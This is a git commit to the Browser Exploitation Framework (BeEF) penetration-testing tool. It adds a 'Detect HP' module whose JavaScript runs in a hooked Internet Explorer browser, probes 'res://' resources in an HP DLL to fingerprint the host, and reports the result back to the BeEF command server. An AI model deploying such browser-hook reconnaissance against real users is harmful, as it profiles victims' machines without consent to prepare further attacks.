Add Detect HP module

This commit is contained in:
bcoles
2014-03-20 00:52:25 +10:30
parent 4a603b9f00
commit fab0bf6b24
3 changed files with 66 additions and 0 deletions

View File

@@ -0,0 +1,35 @@
//
// Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var is_hp = new Array;
var dom = document.createElement('b');
parse_results = function() {
var result = "false";
if (is_hp.length) result = "true";
beef.net.send("<%= @command_url %>", <%= @command_id %>, "is_hp="+result);
};
var fingerprints = new Array(
new Array("warning","res://hpnetworkcheckplugin.dll/warning.jpg"),
new Array("hpr_rgb","res://hpnetworkcheckplugin.dll/HPR_D_B_RGB_72_LG.png")
);
for (var i=0; i<fingerprints.length; i++) {
var img = new Image;
img.id = fingerprints[i][0];
img.name = fingerprints[i][0];
img.src = fingerprints[i][1];
img.onload = function() { is_hp.push(this.id); dom.removeChild(this); }
dom.appendChild(img);
}
setTimeout('parse_results();', 2000);
});

View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_hp:
enable: true
category: "Host"
name: "Detect Hewlett-Packard"
description: "This module attempts to detect software installed by default on HP systems. It uses the 'res' protocol handler which works only on Internet Explorer."
authors: ["bcoles"]
target:
working: ["IE"]
not_working: ["ALL"]

View File

@@ -0,0 +1,15 @@
#
# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
##
class Detect_hp < BeEF::Core::Command
def post_execute
content = {}
content['is_hp'] = @datastore['is_hp'] if not @datastore['is_hp'].nil?
save content
end
end